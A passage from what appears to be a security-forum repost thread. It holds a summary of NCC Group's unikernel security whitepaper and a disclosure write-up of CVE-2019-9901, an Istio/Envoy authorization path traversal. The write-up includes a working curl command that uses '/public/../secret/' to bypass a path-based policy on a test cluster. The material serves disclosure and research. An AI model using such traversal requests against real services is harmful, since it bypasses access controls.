through environmental design. This article was originally posted on Peerlyst. Sursa: http://brilliancesecuritymagazine.com/op-ed/how-to-perform-physical-penetration-testing/
-
Assessing Unikernel Security In this “modern” era of software development, the spotlight has bounced from virtual machines on clouds, to containers on clouds, to, currently, container orchestration… on clouds. As the “container wars” rage on, leaving behind multiple evolutionarily (or politically) dead-end implementations, unikernels are on the rise. Unikernels are applications built as specialized, minimal operating systems. While unikernels originated as an academic curiosity in the 90s, the modern crop are primarily focused on running as lightweight paravirtualized guests… on clouds. While some proponents of unikernels consider them to be the successor to containers, the two are, in fact, fairly different beasts with different tradeoffs. While containers make Unix/POSIX the base abstraction for applications, unikernels declare their own. Some unikernels focus on providing varying levels of POSIX compatibility, while others are based around specific programming languages, providing idiomatic APIs for applications written in those languages. However, the core concept of unikernels goes deeper: their main appeal is not the features that they provide, but rather, those that they don’t. Unikernels intentionally omit a great deal of the functionality typically found in full-featured operating systems, which their developers deemed to be not only unnecessary baggage, but also a potential security risk (as their presence substantially increases the system’s attack surface). Furthermore, those developers often attempt to simplify — and even completely reimplement — major OS components such as the network stack, throwing out what supporters call “cruft” and skeptics call “well-tested” or “mature” code. Advocates claim that unikernels are smaller, nimbler, and more secure by virtue of freeing themselves from the shackles of decades-old operating systems code. Such idealized claims are indeed appealing, but are they actually true? Our recently-posted whitepaper covers our initial foray into unikernels and focuses on the native aspects of application security as applied to them. Unikernel applications have a threat model unlike that of normal processes running on a standard operating system, Unix container or otherwise; in unikernels, general application code runs entirely within kernel space. We begin the whitepaper by describing the general threat model of unikernels as compared to that of containers. We then describe several relevant core security features and exploitation mitigations both within and provided by modern operating systems and build toolchains, and explore how these may apply to unikernels. This forms the basis of our methodology for assessing the general correctness and safety of unikernels. We go on to apply this testing methodology to two major open-source unikernel projects, Rumprun and IncludeOS. For each unikernel, we provide a suite of test cases to invoke and identify relevant security protections, and dig into their source and compiled code to uncover further issues. We also discuss unikernel-specific exploitation techniques and provide example exploit code for common memory corruption vulnerabilities. The presence of these vulnerability classes would enable reliable blind remote exploitation; that is, an attacker could gain arbitrary code execution in ring 0 without any direct knowledge of either the source code or the binary. Other notable vulnerabilities include a brute-force attack that takes advantage of unikernels’ ability to restart almost instantly, and a stack overflow that is able to stomp over the very copy instruction that caused it due to unusual section ordering. We then document a number of remediation and hardening recommendations for each unikernel and document our disclosure interactions with each project. As part of the latter, we assess the upstream patches made in response to our findings and recommendations. We introduce a series of our own patches that remediate a number of the issues we identified in Rumprun, many of which apply more generally to the Xen Mini-OS kernel on which it is based. These can be found here,1 here,2 and here.3 To conclude, we contrast the proclaimed security benefits of unikernels with our actual results. We also briefly describe our current and future research into the security pitfalls of another oft-touted “security feature” of unikernels: the complete reimplementation of mature, external-facing OS components such as the network stack. Even if this process does simplify and modernize the relevant code, as unikernel proponents claim, it also throws out decades of edge-case handling and security fixes that have accreted in response to security vulnerabilities. We are concerned that such re-implementation efforts do not show appropriate respect to the maturity of such codebases, and in doing so may reopen Pandora’s box. As a side note, we will shortly announce several issues that we identified in the MirageOS unikernel but did not cover in our ToorCon XX talk due to disclosure timelines. NCC Group regularly performs a large number of engagements assessing the security and hardening of applications and services, and the platforms they run on, in, and under, including containers, clouds, PaaSes, embedded runtimes, and specialized sandboxes, to name a few. The authors were drawn to this research by the potential and promise unikernel technology (still) has to build lightweight, performant, robust, and secure services in fundamentally new ways. If you’re building any of the above, especially anything unikernel-based, we’d love to help. https://github.com/nccgroup/rumprun↩ https://github.com/nccgroup/src-netbsd↩ https://github.com/nccgroup/buildrump.sh↩ Published date: 02 April 2019 Written by: Jeff Dileo and Spencer Michaels Sursa: https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2019/april/assessing-unikernel-security/
-
CVE-2019-9901 - Istio/Envoy Path traversal TLDR; I found a path traversal bug in Istio's authorization policy enforcement. Discovery About a year ago, as a part of a customer project, I started looking at Istio, and I really liked what I saw. In fact I liked it so much that I decided to submit a talk for it for JavaZone in 2018. My favorite thing about Istio was, and still is, the mutualTLS authentication and authorization with workload bound certificates with SPIFFE identities. Istio has evolved a lot from the first version 0.5.0, which I initially looked at, to the 1.1 release. The 0.5.0 authorization policies came in the form of deniers, which sounded a lot like blacklists. The later versions have moved to a positive security model (whitelist), where you can specify which workloads (and/or end-users based on JWT) should be allowed to access certain services. Further restrictions can be specified using a set of protocol based authorization rules. I really like the coarse-grained workload authorization, but I'm not too fond of the protocol based rules. We have seen different parsers interpreting the same thing in different ways way too many times. Some perfect examples of this, are in Orange Tsai brilliant research presented in A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages!. I mentioned my concerns about this in some later versions of my Istio talk, but never actually tested it... untill now... The bug I set up a simple project with a web server and deployed it on Kubernetes. The web application had two endpoints /public/ and /secret/. I added an authorization policy which tried to grant access to anything below /public/: rules: - services: ["backend.fishy.svc.cluster.local"] methods: ["GET"] paths: ["/public/*"] I then used standard path traversal from curl: curl -vvvv --path-as-is "http://backend.fishy.svc.cluster.local:8081/public/../secret/" And was able to reach /secret/. Timeline The istio team was very friendly and responsive and kept me up to date on the progress. 2019-02-18: I send the intial bug report sent to the istio-security-vulnerabilities mailbox 2019-02-18: Istio Team acknowledges receiving the report 2019-02-20: Istio Team reports the bug has been triaged and work started 2019-02-27: I ask some follow up questions to the mail received on the 20th 2019-02-27: Istio Team replies to questions 2019-03-28: Istio Team updates me about working with the Envoy team to fix this and plan to release this on April 2nd. The envoy issue was created on the 20th of February: https://github.com/envoyproxy/envoy/issues/6008 2019-04-01: Istio Team sends an new update setting April 5th as a new target date 2019-04-05: The security fix is published in Istio version 1.1.2/1.0.7 and Envoy version 1.9.1. The Envoy bug is assigned CVE-2019-9901 Sursa: https://github.com/eoftedal/writings/blob/master/published/CVE-2019-9901-path-traversal.md